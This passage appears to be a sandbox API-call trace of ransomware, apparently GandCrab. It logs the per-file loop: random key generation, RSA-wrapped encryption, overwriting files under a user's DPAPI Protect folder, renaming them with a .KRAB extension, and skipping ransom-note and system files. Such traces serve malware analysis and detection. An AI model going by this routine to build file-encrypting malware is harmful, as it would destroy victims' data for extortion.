flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.926] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.927] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.927] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.928] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.928] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.928] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.928] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.928] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.928] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.929] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.929] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.929] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.929] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.929] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.930] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.930] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd320) returned 1 [0061.930] CryptGetKeyParam (in: hKey=0xfbd320, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.930] CryptEncrypt (in: hKey=0xfbd320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.930] GetLastError () returned 0x0 [0061.930] CryptDestroyKey (hKey=0xfbd320) returned 1 [0061.931] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.931] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.931] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd720) returned 1 [0061.931] CryptGetKeyParam (in: hKey=0xfbd720, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.931] CryptEncrypt (in: hKey=0xfbd720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.932] GetLastError () returned 0x0 [0061.932] CryptDestroyKey (hKey=0xfbd720) returned 1 [0061.932] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.932] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.932] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.932] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.933] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x1d4, lpOverlapped=0x0) returned 1 [0061.946] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.946] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x1d4, lpOverlapped=0x0) returned 1 [0061.946] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.947] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.953] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.953] CloseHandle (hObject=0x448) returned 1 [0061.957] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.958] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a.krab")) returned 1 [0061.959] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.959] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.959] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0061.959] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0061.959] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt" [0061.959] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.960] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt.KRAB") returned 123 [0061.960] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned 118 [0061.960] lstrlenW (lpString=".txt") returned 4 [0061.960] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.960] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0061.960] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.960] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned 118 [0061.960] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned 118 [0061.960] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0061.961] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0061.961] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0061.961] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0061.961] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0061.961] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0061.961] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0061.961] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0061.961] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0061.961] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0061.961] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.961] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.961] lstrcmpW (lpString1="Preferred", lpString2=".") returned 1 [0061.961] lstrcmpW (lpString1="Preferred", lpString2="..") returned 1 [0061.961] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="Preferred" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred" [0061.961] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.962] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred.KRAB") returned 116 [0061.962] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned 111 [0061.962] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned 111 [0061.962] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned 111 [0061.962] lstrcmpiW (lpString1="Preferred", lpString2="desktop.ini") returned 1 [0061.962] lstrcmpiW (lpString1="Preferred", lpString2="autorun.inf") returned 1 [0061.962] lstrcmpiW (lpString1="Preferred", lpString2="ntuser.dat") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="iconcache.db") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="bootsect.bak") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="boot.ini") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="ntuser.dat.log") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="thumbs.db") returned -1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="KRAB-DECRYPT.html") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="KRAB-DECRYPT.txt") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="ntldr") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="NTDETECT.COM") returned 1 [0061.965] lstrcmpiW (lpString1="Preferred", lpString2="Bootfont.bin") returned 1 [0061.965] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.966] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.966] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.967] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.967] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.967] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.967] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.967] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.967] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.968] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.968] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.968] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.968] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.968] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.969] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.969] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.969] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd420) returned 1 [0061.969] CryptGetKeyParam (in: hKey=0xfbd420, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.969] CryptEncrypt (in: hKey=0xfbd420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.970] GetLastError () returned 0x0 [0061.970] CryptDestroyKey (hKey=0xfbd420) returned 1 [0061.970] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.970] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.970] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd960) returned 1 [0061.970] CryptGetKeyParam (in: hKey=0xfbd960, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.970] CryptEncrypt (in: hKey=0xfbd960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.971] GetLastError () returned 0x0 [0061.971] CryptDestroyKey (hKey=0xfbd960) returned 1 [0061.971] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.971] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.971] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.972] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.972] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x18, lpOverlapped=0x0) returned 1 [0061.985] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.985] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x18, lpOverlapped=0x0) returned 1 [0061.985] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.985] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.003] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.003] CloseHandle (hObject=0x448) returned 1 [0062.004] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.005] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\preferred"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\preferred.krab")) returned 1 [0062.006] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.006] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0062.006] FindClose (in: hFindFile=0xfbd820 | out: hFindFile=0xfbd820) returned 1 [0062.006] CloseHandle (hObject=0x440) returned 1 [0062.006] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.006] lstrcmpW (lpString1="SYNCHIST", lpString2=".") returned 1 [0062.007] lstrcmpW (lpString1="SYNCHIST", lpString2="..") returned 1 [0062.007] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="SYNCHIST" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" [0062.007] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.007] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.KRAB") returned 69 [0062.007] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0062.007] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0062.007] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0062.007] lstrcmpiW (lpString1="SYNCHIST", lpString2="desktop.ini") returned 1 [0062.007] lstrcmpiW (lpString1="SYNCHIST", lpString2="autorun.inf") returned 1 [0062.007] lstrcmpiW (lpString1="SYNCHIST", lpString2="ntuser.dat") returned 1 [0062.007] lstrcmpiW (lpString1="SYNCHIST", lpString2="iconcache.db") returned 1 [0062.007] lstrcmpiW (lpString1="SYNCHIST", lpString2="bootsect.bak") returned 1 [0062.007] lstrcmpiW (lpString1="SYNCHIST", lpString2="boot.ini") returned 1 [0062.007] lstrcmpiW (lpString1="SYNCHIST", lpString2="ntuser.dat.log") returned 1 [0062.007] lstrcmpiW (lpString1="SYNCHIST", lpString2="thumbs.db") returned -1 [0062.007] lstrcmpiW (lpString1="SYNCHIST", lpString2="KRAB-DECRYPT.html") returned 1 [0062.008] lstrcmpiW (lpString1="SYNCHIST", lpString2="KRAB-DECRYPT.txt") returned 1 [0062.008] lstrcmpiW (lpString1="SYNCHIST", lpString2="CRAB-DECRYPT.txt") returned 1 [0062.008] lstrcmpiW (lpString1="SYNCHIST", lpString2="ntldr") returned 1 [0062.008] lstrcmpiW (lpString1="SYNCHIST", lpString2="NTDETECT.COM") returned 1 [0062.008] lstrcmpiW (lpString1="SYNCHIST", lpString2="Bootfont.bin") returned 1 [0062.008] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.008] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0062.008] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0062.009] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.009] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.009] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0062.009] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.009] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.010] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0062.010] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0062.011] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.011] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.011] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0062.011] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.011] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.011] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0062.012] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd820) returned 1 [0062.012] CryptGetKeyParam (in: hKey=0xfbd820, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.012] CryptEncrypt (in: hKey=0xfbd820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.012] GetLastError () returned 0x0 [0062.012] CryptDestroyKey (hKey=0xfbd820) returned 1 [0062.012] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.012] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0062.013] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd620) returned 1 [0062.013] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.013] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.013] GetLastError () returned 0x0 [0062.013] CryptDestroyKey (hKey=0xfbd620) returned 1 [0062.013] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.013] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0062.014] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0062.014] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0062.014] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0x4c, lpOverlapped=0x0) returned 1 [0062.034] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xffffffb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.034] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0x4c, lpOverlapped=0x0) returned 1 [0062.035] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, 